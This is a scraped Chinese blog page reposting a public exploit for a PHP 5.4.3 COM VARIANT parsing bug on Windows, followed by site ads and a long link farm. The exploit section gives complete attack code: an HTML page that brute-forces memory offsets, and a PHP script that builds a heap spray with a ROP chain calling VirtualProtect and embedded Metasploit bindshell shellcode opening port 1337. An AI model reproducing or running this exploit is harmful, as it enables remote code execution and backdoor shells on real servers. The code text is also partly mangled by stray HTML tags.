// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
// Exploit author: 0in (Maksymilian Motyl)
// Email: 0in(dot)email(at)gmail.com
// * Bug with Variant type parsing originally discovered by Condis
// Tested on Windows XP SP3 fully patched (Polish)
===================
offset-brute.html
===================



PHP 5.4.3 0day by 0in & cOndis

</textarea> <br></center> <br><script> <br>function sleep(milliseconds) { <br>var start = new Date().getTime(); <br>for (var i = 0; i < 1e7; i++) { <br>if ((new Date().getTime() - start) > milliseconds){ <br>break; <br>} <br>} <br>} <br>function makeRequest(url, parameters) <br>{ <br>var xmlhttp = new XMLHttpRequest(); <br>if (window.XMLHttpRequest) { <br>xmlhttp = new XMLHttpRequest(); <br>if (xmlhttp.overrideMimeType) { <br>xmlhttp.overrideMimeType('text/xml'); <br>} <br>} else if (window.ActiveXObject) { <br>// IE <br>try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); } <br>catch (e) { <br>try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); } <br>catch (e) {} <br>} <br>} <br>if (!xmlhttp) { <br>alert('Giving up Cannot create an XMLHTTP instance'); <br>return false; <br>} <br>xmlhttp.open("GET",url,true); <br>xmlhttp.send(null); <br>return true; <br>} <br>test=document.getElementById("log"); <br>for(offset=0;offset<300;offset++) <br>{ <br>log.value+="Trying offset:"+offset+"\r\n"; <br>makeRequest("0day.php?offset="+offset); <br>sleep(500); <br>} <br></script></body></html> <br>=================== <br>0day.php <br>=================== <br><?php <br>$spray = str_repeat("\x90",0x200); <br>$offset=$_GET['offset']; <br>// 775DF0Da # ADD ESP,10 # RETN ** [ole32.dll] <br>$spray = substr_replace($spray, "\xda\xf0\x5d\x77", (strlen($spray))*-1,(strlen($spray))*-1); <br>// :> 0x048d0030 <br>$spray = substr_replace($spray, pack("L",0x048d0030+$offset), (strlen($spray)-0x8)*-1,(strlen($spray))*-1); <br>//0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN [ole32.dll] <br>$spray = substr_replace($spray, "\x9f\xae\x52\x77", (strlen($spray)-0x10)*-1,(strlen($spray))*-1); <br>// Adress of VirtualProtect 0x7c801ad4 <br>$spray = substr_replace($spray, "\xd4\x1a\x80\x7c", (strlen($spray)-0x14)*-1,(strlen($spray))*-1); <br>// LPVOID lpAddress = 0x048d0060 www.jb51.net <br>$spray = substr_replace($spray, pack("L",0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1); <br>// SIZE_T dwSize = 0x01000000 <br>$spray = substr_replace($spray, "\x00\x00\x10\x00", (strlen($spray)-0x20)*-1,(strlen($spray))*-1); <br>// DWORD flNewProtect = PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0 <br>$spray = substr_replace($spray, "\x40\x00\x00\x00", (strlen($spray)-0x24)*-1,(strlen($spray))*-1); <br>// __out PDWORD lpflOldProtect = 0x04300070 | 0x105240000 <br>// 0x048d0068 <br>$spray = substr_replace($spray, pack("L",0x048d0068+$offset), (strlen($spray)-0x28)*-1,(strlen($spray))*-1); <br>//0x77dfe8b4 : # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C ** [ADVAPI32.dll] <br>$spray = substr_replace($spray, "\xb4\xe8\xdf\x77", (strlen($spray)-0x18)*-1,4); <br>// Ret Address = 0x048d0080 <br>$spray = substr_replace($spray, pack("L",0x048d0080+$offset), (strlen($spray)-0x48)*-1,4); <br>$stacktrack = "\xbc\x0c\xb0\xc0\x00"; <br>// Universal win32 bindshell on port 1337 from metasploit <br>$shellcode = $stacktrack."\x33\xc9\x83\xe9\xb0". <br>"\x81\xc4\xd0\xfd\xff\xff". <br>"\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d". <br>"\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96". <br>"\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2". <br>"\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0". <br>"\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41". <br>"\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82". <br>"\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2". <br>"\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39". <br>"\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9". <br>"\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b". <br>"\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a". <br>"\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88". <br>"\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01". <br>"\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20". <br>"\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e". <br>"\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39". <br>"\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44". <br>"\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96". <br>"\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38". <br>"\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9". <br>"\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09". <br>"\x4e\x33\xe4\x96\xcd\xcc\x32\x69"; <br>$spray = substr_replace($spray,$shellcode, (strlen($spray)-0x50)*-1,(strlen($shellcode))); <br>$fullspray=""; <br>for($i=0;$i<0x4b00;$i++) <br>{ <br>$fullspray.=$spray; <br>} <br>$j=array(); <br>$e=array(); <br>$b=array(); <br>$a=array(); <br>$c=array(); <br>array_push($j,$fullspray); <br>array_push($e,$fullspray."W"); <br>array_push($b,$fullspray."A"); <br>array_push($a,$fullspray."S"); <br>array_push($c,$fullspray."!"); <br>$vVar = new VARIANT(0x048d0038+$offset); <br>// Shoot him <br>com_print_typeinfo($vVar); //CRASH -> 102F3986 FF50 10 CALL DWORD PTR DS:[EAX+10] <br>echo $arr; <br>echo $spray; <br>?> <div class="clearfix"> <span id="art_bot" class="jbTestPos"></span> </div> </article> <div class="post-actions"> </div> <div class="post-copyright-custom"> 【声明】：本博客不参与任何交易，也非中介，仅记录个人感兴趣的主机测评结果和优惠活动，内容均不作直接、间接、法定、约定的保证。访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客，即表示您已经知晓并接受了此声明通告。 </div> <div class="shares"><dfn>分享到</dfn> <a href="javascript:;" data-url="http://img.liuyifei.net/xq/104642.html" class="share-weixin" title="分享到微信"><i class="tbfa"></i></a><a etap="share" data-share="weibo" class="share-tsina" title="分享到微博"><i class="tbfa"></i></a><a etap="share" data-share="qq" class="share-sqq" title="分享到QQ好友"><i class="tbfa"></i></a><a etap="share" data-share="qzone" class="share-qzone" title="分享到QQ空间"><i class="tbfa"></i></a><a etap="share" data-share="line" class="share-line" title="分享到Line"><i class="tbfa"></i></a><a etap="share" data-share="twitter" class="share-twitter" title="分享到Twitter"><i class="tbfa"></i></a><a etap="share" data-share="facebook" class="share-facebook" title="分享到Facebook"><i class="tbfa"></i></a><a etap="share" data-share="telegram" class="share-telegram" title="分享到Telegram"><i class="tbfa"></i></a><a etap="share" data-share="skype" class="share-skype" title="分享到Skype"><i class="tbfa"></i></a> </div> <div class="article-tags"> </div> <nav class="article-nav"> <span class="article-nav-prev">上一篇<br> <a href="/xq/104641.html" rel="prev">讯时后台管理系统v4.9的鸡肋漏洞分析_漏洞分析_网络安全_</a> </span> <span class="article-nav-next">下一篇<br> <a href="/xq/104643.html" rel="next">腾讯QQ空间的跨站漏洞介绍以及修复解决的方案(图)_漏洞分析_网络安全_</a> </span> </nav> <div class="orbui orbui-post orbui-post-02"> <a href="https://www.west.cn/ykj/?shopid=1348148" target="_blank" rel="nofollow noopener noreferrer"> <img src="http://img.liuyifei.net/uploads/20231105/c556cae1a2ea159a7de0b60a2064040e.png" height="60" width="778"/> </a> <a href="https://www.west.cn?ReferenceID=1348148" target="_blank" rel="nofollow noopener noreferrer"> <img src="http://img.liuyifei.net/uploads/20231202/01472f07e3409cc0c4b37ca464b6e7b5.jpg" height="60" width="778"/> </a> </div> <div class="relates relates-textcol2"> <div class="title"><h3>相关推荐</h3></div> <ul> <li><a href="/xq/104566.html">NoName Script _Exploit_网络安全_</a></li> <li><a href="/xq/104572.html">FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh) _Exploit_网络安全_</a></li> <li><a href="/xq/104887.html">3Dmax2010怎么建模树干模型? 3Dmax2010树干建模的教程_建模教程_3DMAX教程_媒体动画_</a></li> <li><a href="/xq/104888.html">3dmax怎么建模电线? 3dmax电线模型的设计方法_建模教程_3DMAX教程_媒体动画_</a></li> <li><a href="/xq/104890.html">3dmax怎么建模冰淇淋模型? 3dmax甜筒冰淇淋的设计方法_建模教程_3DMAX教程_媒体动画_</a></li> <li><a href="/xq/104895.html">3dsMax怎么建模一只可爱的树叶兔子模型?_建模教程_3DMAX教程_媒体动画_</a></li> <li><a href="/xq/104896.html">3dmax怎么设计简单的圆形茶几模型?_建模教程_3DMAX教程_媒体动画_</a></li> <li><a href="/xq/104897.html">3dmax怎么设计车站座椅? 3dmax设计座椅沙发的教程_建模教程_3DMAX教程_媒体动画_</a></li> <li><a href="/xq/104898.html">3dmax怎么建模多阶台阶? 3dmax台阶模型的绘制方法_建模教程_3DMAX教程_媒体动画_</a></li> <li><a href="/xq/104899.html">3dsMax怎么设计造型很现代化的台灯模型?_建模教程_3DMAX教程_媒体动画_</a></li> </ul> </div> <div class="orbui orbui-post orbui-post-03"></div> </div> </div> <div class="sidebar"> <div class="widget-on-phone widget widget_ui_orbui"> <div class="item"> <aside id="custom_html-5"></aside> <div class="textwidget custom-html-widget"> <p> <a href="https://www.west.cn/ykj/?shopid=1348148"> <img loading="lazy" class="alignnone size-full wp-image-43557" src="http://img.liuyifei.net/uploads/20231105/41f99292f597bf189af086635f87afb7.png" alt="右" width="315" height="100"> </a> </p> <p> <a href="http://91w.net/show/47395.html"> <img loading="lazy" class="alignnone size-full wp-image-43557" src="http://img.liuyifei.net/uploads/20240108/31fef4fea386141ff6e7b3d7499f7f5a.jpg" alt="网站出售" width="315" height="100"> </a> </p> <p> <a href="http://91w.net/show/47396.html"> <img loading="lazy" class="alignnone size-full wp-image-43557" src="http://img.liuyifei.net/uploads/20240108/31fef4fea386141ff6e7b3d7499f7f5a.jpg" alt="网站出售" width="315" height="100"> </a> </p> <p> <a href="http://91w.net/show/45413.html"> <img loading="lazy" class="alignnone size-full wp-image-43557" src="http://img.liuyifei.net/uploads/20211129/884e050fe7cb28dfce618986ece5663e.png" alt="微信公众号抽奖" width="315" height="100"> </a> </p> <p> <a href="http://91w.net/show/45514.html"> <img loading="lazy" class="alignnone size-full wp-image-43557" src="http://img.liuyifei.net/uploads/20211209/7e87601e3ced53378f90e9d6000bb6e2.png" alt="vr全景制作" width="315" height="100"> </a> </p> </div> </div> <div class="widget_text widget-on-phone widget widget_custom_html"><h3>互动交流中心</h3> <div class="textwidget custom-html-widget"> <p><span style="color: #ff0000;"><b>Contact：商家投稿、广告投放</b></span></p> <p><span style="color: #ff0000;"><b>QQ交流：512953070</b></span></p> <p><span style="color: #ff0000;"><b>投稿邮箱：512953070@qq.com</b></span></p> </div> </div> <div class="widget-on-phone widget widget_ui_orbui"> <div class="item"> <aside id="custom_html-5"></aside> <div class="textwidget custom-html-widget"> </div> </div> <div class="widget-on-phone widget widget_ui_posts"><h3>热门推荐</h3> <ul> <li> <a target="_blank" href="/xq/17990.html"> <span class="thumbnail"> <img data-src="http://img.liuyifei.net//img.jbzj.com/file_images/article/201601/2016011809192325.jpg" alt="Photoshop合成时尚清新的护肤品电商促销海报教程_photoshop教程_" src="http://img.liuyifei.net//img.jbzj.com/file_images/article/201601/2016011809192325.jpg" onerror="javascript:this.src='/assets/index/image/logo.png';" class="thumb"> </span> <span class="text">Photoshop合成时尚清新的护肤品电商促销海报教程_photoshop教程_</span> <span class="muted">2023-12-22</span> </a> </li> <li> <a target="_blank" href="/xq/1.html"> <span class="thumbnail"> <img data-src="http://img.liuyifei.net/uploads/20231105/de479dfaa0eb01f5b08b0332e80ba063.png" alt="软文发布招租，接广告，实时流量看详情" src="http://img.liuyifei.net/uploads/20231105/de479dfaa0eb01f5b08b0332e80ba063.png" onerror="javascript:this.src='/assets/index/image/logo.png';" class="thumb"> </span> <span class="text">软文发布招租，接广告，实时流量看详情</span> <span class="muted">2023-11-04</span> </a> </li> <li> <a target="_blank" href="/xq/35734.html"> <span class="thumbnail"> <img data-src="http://img.liuyifei.net//img.jbzj.com/do/uploads/allimg/120327/1712020.jpg" alt="IE8在登录淘宝时自动关闭或内存指令错误的原因及解决方法_其它系统_操作系统_" src="http://img.liuyifei.net//img.jbzj.com/do/uploads/allimg/120327/1712020.jpg" onerror="javascript:this.src='/assets/index/image/logo.png';" class="thumb"> </span> <span class="text">IE8在登录淘宝时自动关闭或内存指令错误的原因及解决方法_其它系统_操作系统_</span> <span class="muted">2024-01-18</span> </a> </li> <li> <a target="_blank" href="/xq/28771.html"> <span class="thumbnail"> <img data-src="http://img.liuyifei.net/uploads/20240108/31fef4fea386141ff6e7b3d7499f7f5a.jpg" alt="网站出售" src="http://img.liuyifei.net/uploads/20240108/31fef4fea386141ff6e7b3d7499f7f5a.jpg" onerror="javascript:this.src='/assets/index/image/logo.png';" class="thumb"> </span> <span class="text">网站出售</span> <span class="muted">2024-01-08</span> </a> </li> <li> <a target="_blank" href="/xq/10693.html"> <span class="thumbnail"> <img data-src="http://img.liuyifei.net//img.jbzj.com/file_images/article/201505/20150514144537193.jpg" alt="创业公司精雕细琢的17个优秀网页设计_心得技巧_网页制作_" src="http://img.liuyifei.net//img.jbzj.com/file_images/article/201505/20150514144537193.jpg" onerror="javascript:this.src='/assets/index/image/logo.png';" class="thumb"> </span> <span class="text">创业公司精雕细琢的17个优秀网页设计_心得技巧_网页制作_</span> <span class="muted">2023-12-12</span> </a> </li> </ul> </div> <div class="widget-on-phone widget widget_ui_orbui"> <div class="item"> <aside id="custom_html-5"></aside> <div class="textwidget custom-html-widget"> <center> </center> </div> </div> <div class="widget-on-phone widget widget_ui_orbui"> <div class="item"><h3>分类目录</h3> <div class="tbcm-newtags"> </div> </div> </div> </div> </section> <footer class="footer"> <div class="container"> <div class="flinks"> <strong>友情链接</strong> <ul class='xoxo blogroll'> <li><a href="http://www.91w.net/show/44860.html" target="_blank" title="采集程序" target="_blank">采集程序</a></li> <li><a href="http://www.91w.net/show/47395.html" target="_blank" title="网站源码出售" target="_blank">网站源码出售</a></li> <li><a href="http://www.91w.net/ym" target="_blank" title="老域名出售页面" target="_blank">老域名出售页面</a></li> <li><a href="/xz" target="_blank" title="下载" target="_blank">下载</a></li> <li><a href="/yx" target="_blank" title="游戏" target="_blank">游戏</a></li> <li><a href="http://www.91w.net/sitemap" target="_blank" title="网站导航" target="_blank">网站导航</a></li> <li><a href="http://www.91w.net/news" target="_blank" title="文章" target="_blank">文章</a></li> <li><a href="http://www.91w.net/all" target="_blank" title="源码下载" target="_blank">源码下载</a></li> <li><a href="http://www.91w.net/down" target="_blank" title="软件下载" target="_blank">软件下载</a></li> <li><a href="http://www.91w.net/game" target="_blank" title="游戏下载" target="_blank">游戏下载</a></li> <li><a href="http://www.91w.net/program" target="_blank" title="资料" target="_blank">资料</a></li> <li><a href="http://www.91w.net/fx" target="_blank" title="资源分享" target="_blank">资源分享</a></li> <li><a href = "http://www.sixgod.net/xq/104642.html" title="六神" target="_blank">六神</a></li> <li><a href = "http://sixgod.net/xq/104642.html" title="六神" target="_blank">六神</a></li> <li><a href = "http://haifeisi.net/xq/104642.html" title="海飞丝" target="_blank">海飞丝</a></li> <li><a href = "http://www.haifeisi.net/xq/104642.html" title="海飞丝" target="_blank">海飞丝</a></li> <li><a href = "http://flerken.cn/xq/104642.html" title="噬元兽" target="_blank">噬元兽</a></li> <li><a href = "http://www.flerken.cn/xq/104642.html" title="噬元兽" target="_blank">噬元兽</a></li> <li><a href = "http://bieha.cn/xq/104642.html" title="bieha.cn" target="_blank">bieha.cn</a></li> <li><a href = "http://www.bieha.cn/xq/104642.html" title="www.bieha.cn" target="_blank">www.bieha.cn</a></li> <li><a href = "http://miuti.cn/xq/104642.html" title="缪缇(Miuti)内衣" target="_blank">缪缇(Miuti)内衣</a></li> <li><a href = "http://www.miuti.cn/xq/104642.html" title="缪缇(Miuti)内衣" target="_blank">缪缇(Miuti)内衣</a></li> <li><a href = "http://dk028.com/xq/104642.html" title="dk028.com" target="_blank">dk028.com</a></li> <li><a href = "http://www.dk028.com/xq/104642.html" title="www.dk028.com" target="_blank">www.dk028.com</a></li> <li><a href = "http://scflcp.cn/xq/104642.html" title="四川福利" target="_blank">四川福利</a></li> <li><a href = "http://www.scflcp.cn/xq/104642.html" title="四川福利" target="_blank">四川福利</a></li> <li><a href = "http://bzbl.cn/xq/104642.html" title="bzbl.cn" target="_blank">bzbl.cn</a></li> <li><a href = "http://www.bzbl.cn/xq/104642.html" title="www.bzbl.cn" target="_blank">www.bzbl.cn</a></li> <li><a href = "http://mlft.cn/xq/104642.html" title="mlft.cn" target="_blank">mlft.cn</a></li> <li><a href = "http://www.mlft.cn/xq/104642.html" title="www.mlft.cn" target="_blank">www.mlft.cn</a></li> <li><a href = "http://7zz.net/xq/104642.html" title="7zz压缩" target="_blank">7zz压缩</a></li> <li><a href = "http://www.7zz.net/xq/104642.html" title="7zz压缩" target="_blank">7zz压缩</a></li> <li><a href = "http://91w.net/xq/104642.html" title="91大神" target="_blank">91大神</a></li> <li><a href = "http://www.91w.net/xq/104642.html" title="91大神" target="_blank">91大神</a></li> <li><a href = "http://liuyifei.net/xq/104642.html" title="刘亦菲" target="_blank">刘亦菲</a></li> <li><a href = "http://www.liuyifei.net/xq/104642.html" title="刘亦菲" target="_blank">刘亦菲</a></li> <li><a href = "http://sewai.cn/xq/104642.html" title="sewai.cn" target="_blank">sewai.cn</a></li> <li><a href = "http://www.sewai.cn/xq/104642.html" title="www.sewai.cn" target="_blank">www.sewai.cn</a></li> <li><a href = "http://58t.net/xq/104642.html" title="58同城" target="_blank">58同城</a></li> <li><a href = "http://www.58t.net/xq/104642.html" title="58同城" target="_blank">58同城</a></li> <li><a href = "http://yamiao.net/xq/104642.html" title="鸭苗" target="_blank">鸭苗</a></li> <li><a href = "http://www.yamiao.net/xq/104642.html" title="鸭苗" target="_blank">鸭苗</a></li> <li><a href = "http://caclrc.cn/xq/104642.html" title="caclrc.cn" target="_blank">caclrc.cn</a></li> <li><a href = "http://rgbbs.cn/xq/104642.html" title="rgbbs.cn" target="_blank">rgbbs.cn</a></li> <li><a href = "http://heiapp.net/xq/104642.html" title="heiapp.net" target="_blank">heiapp.net</a></li> <li><a href = "http://zhfjx.cn/xq/104642.html" title="zhfjx.cn" target="_blank">zhfjx.cn</a></li> <li><a href = "http://sshfy.cn/xq/104642.html" title="sshfy.cn" target="_blank">sshfy.cn</a></li> <li><a href = "http://sxdgc.cn/xq/104642.html" title="sxdgc.cn" target="_blank">sxdgc.cn</a></li> <li><a href = "http://28city.cn/xq/104642.html" title="28city.cn" target="_blank">28city.cn</a></li> <li><a href = "http://www.caclrc.cn/xq/104642.html" title="www.caclrc.cn" target="_blank">www.caclrc.cn</a></li> <li><a href = "http://www.rgbbs.cn/xq/104642.html" title="www.rgbbs.cn" target="_blank">www.rgbbs.cn</a></li> <li><a href = "http://www.heiapp.net/xq/104642.html" title="www.heiapp.net" target="_blank">www.heiapp.net</a></li> <li><a href = "http://www.zhfjx.cn/xq/104642.html" title="www.zhfjx.cn" target="_blank">www.zhfjx.cn</a></li> <li><a href = "http://www.sshfy.cn/xq/104642.html" title="www.sshfy.cn" target="_blank">www.sshfy.cn</a></li> <li><a href = "http://www.28city.cn/xq/104642.html" title="www.28city.cn" target="_blank">www.28city.cn</a></li> <li><a href = "http://etcb.cn/xq/104642.html" title="etc吧" target="_blank">etc吧</a></li> <li><a href = "http://www.etcb.cn/xq/104642.html" title="etc吧" target="_blank">etc吧</a></li> <li><a href = "http://abdayah.cn/xq/104642.html" title="abdayah.cn" target="_blank">abdayah.cn</a></li> <li><a href = "http://www.abdayah.cn/xq/104642.html" title="www.abdayah.cn" target="_blank">www.abdayah.cn</a></li> <li><a href = "http://ddbdzs.cn/xq/104642.html" title="ddbdzs.cn" target="_blank">ddbdzs.cn</a></li> <li><a href = "http://www.ddbdzs.cn/xq/104642.html" title="www.ddbdzs.cn" target="_blank">www.ddbdzs.cn</a></li> <li><a href = "http://hyflex.cn/xq/104642.html" title="安思尔HyFlex" target="_blank">安思尔HyFlex</a></li> <li><a href = "http://www.hyflex.cn/xq/104642.html" title="安思尔HyFlex" target="_blank">安思尔HyFlex</a></li> <li><a href = "http://studyart.cn/xq/104642.html" title="studyart.cn" target="_blank">studyart.cn</a></li> <li><a href = "http://www.studyart.cn/xq/104642.html" title="www.studyart.cn" target="_blank">www.studyart.cn</a></li> <li><a href = "http://dndf.cn/xq/104642.html" title="dndf.cn" target="_blank">dndf.cn</a></li> <li><a href = "http://www.dndf.cn/xq/104642.html" title="www.dndf.cn" target="_blank">www.dndf.cn</a></li> <li><a href = "http://www.sxdgc.cn/xq/104642.html" title="www.sxdgc.cn" target="_blank">www.sxdgc.cn</a></li> <li><a href = "http://11855.cn/xq/104642.html" title="11855.cn" target="_blank">11855.cn</a></li> <li><a href = "http://www.11855.cn/xq/104642.html" title="www.11855.cn" target="_blank">www.11855.cn</a></li> <li><a href = "http://11566.cn/xq/104642.html" title="11566.cn" target="_blank">11566.cn</a></li> <li><a href = "http://www.11566.cn/xq/104642.html" title="www.11566.cn" target="_blank">www.11566.cn</a></li> <li><a href = "http://11355.cn/xq/104642.html" title="11355.cn" target="_blank">11355.cn</a></li> <li><a href = "http://www.11355.cn/xq/104642.html" title="www.11355.cn" target="_blank">www.11355.cn</a></li> <li><a href = "http://62622.cn/xq/104642.html" title="62622.cn" target="_blank">62622.cn</a></li> <li><a href = "http://www.62622.cn/xq/104642.html" title="www.62622.cn" target="_blank">www.62622.cn</a></li> <li><a href = "http://cbwq.cn/xq/104642.html" title="cbwq.cn" target="_blank">cbwq.cn</a></li> <li><a href = "http://www.cbwq.cn/xq/104642.html" title="www.cbwq.cn" target="_blank">www.cbwq.cn</a></li> <li><a href = "http://www.zrqm.cn/xq/104642.html" title="www.zrqm.cn" target="_blank">www.zrqm.cn</a></li> <li><a href = "http://zrqm.cn/xq/104642.html" title="zrqm.cn" target="_blank">zrqm.cn</a></li> <li><a href = "http://rlfm.cn/xq/104642.html" title="rlfm.cn" target="_blank">rlfm.cn</a></li> <li><a href = "http://www.rlfm.cn/xq/104642.html" title="www.rlfm.cn" target="_blank">www.rlfm.cn</a></li> <li><a href = "http://www.pbtb.cn/xq/104642.html" title="www.pbtb.cn" target="_blank">www.pbtb.cn</a></li> <li><a href = "http://pbtb.cn/xq/104642.html" title="pbtb.cn" target="_blank">pbtb.cn</a></li> <li><a href = "http://knlz.cn/xq/104642.html" title="knlz.cn" target="_blank">knlz.cn</a></li> <li><a href = "http://www.knlz.cn/xq/104642.html" title="www.knlz.cn" target="_blank">www.knlz.cn</a></li> <li><a href = "http://rhwf.cn/xq/104642.html" title="rhwf.cn" target="_blank">rhwf.cn</a></li> <li><a href = "http://www.rhwf.cn/xq/104642.html" title="www.rhwf.cn" target="_blank">www.rhwf.cn</a></li> <li><a href = "http://dxfp.cn/xq/104642.html" title="dxfp.cn" target="_blank">dxfp.cn</a></li> <li><a href = "http://www.dxfp.cn/xq/104642.html" title="www.dxfp.cn" target="_blank">www.dxfp.cn</a></li> <li><a href = "http://rptb.cn/xq/104642.html" title="rptb.cn" target="_blank">rptb.cn</a></li> <li><a href = "http://www.rptb.cn/xq/104642.html" title="www.rptb.cn" target="_blank">www.rptb.cn</a></li> <li><a href = "http://nzjg.cn/xq/104642.html" title="nzjg.cn" target="_blank">nzjg.cn</a></li> <li><a href = "http://www.nzjg.cn/xq/104642.html" title="www.nzjg.cn" target="_blank">www.nzjg.cn</a></li> <li><a href = "http://ygnl.cn/xq/104642.html" title="ygnl.cn" target="_blank">ygnl.cn</a></li> <li><a href = "http://www.ygnl.cn/xq/104642.html" title="www.ygnl.cn" target="_blank">www.ygnl.cn</a></li> <li><a href = "http://rxbg.cn/xq/104642.html" title="人心不古" target="_blank">人心不古</a></li> <li><a href = "http://www.rxbg.cn/xq/104642.html" title="人心不古" target="_blank">人心不古</a></li> <li><a href = "http://rfbc.cn/xq/104642.html" title="rfbc.cn" target="_blank">rfbc.cn</a></li> <li><a href = "http://www.rfbc.cn/xq/104642.html" title="www.rfbc.cn" target="_blank">www.rfbc.cn</a></li> <li><a href = "http://rwbs.cn/xq/104642.html" title="rwbs.cn" target="_blank">rwbs.cn</a></li> <li><a href = "http://www.rwbs.cn/xq/104642.html" title="www.rwbs.cn" target="_blank">www.rwbs.cn</a></li> <li><a href = "http://music.liuyifei.net/xq/104642.html" title="" target="_blank"></a></li> <li><a href = "http://img.liuyifei.net/xq/104642.html" title="img.liuyifei.net" target="_blank">img.liuyifei.net</a></li> <li><a href = "http://drnu.cn/xq/104642.html" title="drnu.cn" target="_blank">drnu.cn</a></li> <li><a href = "http://www.drnu.cn/xq/104642.html" title="www.drnu.cn" target="_blank">www.drnu.cn</a></li> <li><a href = "http://bwsu.cn/xq/104642.html" title="bwsu.cn" target="_blank">bwsu.cn</a></li> <li><a href = "http://www.bwsu.cn/xq/104642.html" title="www.bwsu.cn" target="_blank">www.bwsu.cn</a></li> <li><a href = "http://wyim.cn/xq/104642.html" title="wyim.cn" target="_blank">wyim.cn</a></li> <li><a href = "http://www.wyim.cn/xq/104642.html" title="www.wyim.cn" target="_blank">www.wyim.cn</a></li> <li><a href = "http://dtud.cn/xq/104642.html" title="dtud.cn" target="_blank">dtud.cn</a></li> <li><a href = "http://www.dtud.cn/xq/104642.html" title="www.dtud.cn" target="_blank">www.dtud.cn</a></li> <li><a href = "http://dvtg.cn/xq/104642.html" title="远东运输集团" target="_blank">远东运输集团</a></li> <li><a href = "http://www.dvtg.cn/xq/104642.html" title="远东运输集团" target="_blank">远东运输集团</a></li> <li><a href = "http://fvhc.cn/xq/104642.html" title="中宠兽医联盟" target="_blank">中宠兽医联盟</a></li> <li><a href = "http://www.fvhc.cn/xq/104642.html" title="中宠兽医联盟" target="_blank">中宠兽医联盟</a></li> <li><a href = "http://lble.cn/xq/104642.html" title="拉贝洛尔" target="_blank">拉贝洛尔</a></li> <li><a href = "http://www.lble.cn/xq/104642.html" title="拉贝洛尔" target="_blank">拉贝洛尔</a></li> <li><a href = "http://mvhu.cn/xq/104642.html" title="飞行悍马" target="_blank">飞行悍马</a></li> <li><a href = "http://www.mvhu.cn/xq/104642.html" title="飞行悍马" target="_blank">飞行悍马</a></li> <li><a href = "http://uesese.cn/xq/104642.html" title="uesese.cn" target="_blank">uesese.cn</a></li> <li><a href = "http://www.uesese.cn/xq/104642.html" title="www.uesese.cn" target="_blank">www.uesese.cn</a></li> <li><a href = "http://ikuns.cc/xq/104642.html" title="爱坤" target="_blank">爱坤</a></li> <li><a href = "http://www.ikuns.cc/xq/104642.html" title="爱坤" target="_blank">爱坤</a></li> <li><a href = "http://02613.cn/xq/104642.html" title="02613.cn" target="_blank">02613.cn</a></li> <li><a href = "http://www.02613.cn/xq/104642.html" title="www.02613.cn" target="_blank">www.02613.cn</a></li> <li><a href = "http://lymzi.cn/xq/104642.html" title="lymzi.cn" target="_blank">lymzi.cn</a></li> <li><a href = "http://www.lymzi.cn/xq/104642.html" title="www.lymzi.cn" target="_blank">www.lymzi.cn</a></li> <li><a href = "http://ktoa.cn/xq/104642.html" title="KTOA" target="_blank">KTOA</a></li> <li><a href = "http://www.ktoa.cn/xq/104642.html" title="KTOA" target="_blank">KTOA</a></li> <li><a href = "http://73216.cn/xq/104642.html" title="73216.cn" target="_blank">73216.cn</a></li> <li><a href = "http://www.73216.cn/xq/104642.html" title="www.73216.cn" target="_blank">www.73216.cn</a></li> <li><a href = "http://www.crtwd.cn/xq/104642.html" title="www.crtwd.cn" target="_blank">www.crtwd.cn</a></li> <li><a href = "http://crtwd.cn/xq/104642.html" title="crtwd.cn" target="_blank">crtwd.cn</a></li> <li><a href = "http://szmdx.cn/xq/104642.html" title=" 深圳麦迪逊" target="_blank"> 深圳麦迪逊</a></li> <li><a href = "http://www.szmdx.cn/xq/104642.html" title=" 深圳麦迪逊" target="_blank"> 深圳麦迪逊</a></li> <li><a href = "http://kylkc.cn/xq/104642.html" title="kylkc.cn" target="_blank">kylkc.cn</a></li> <li><a href = 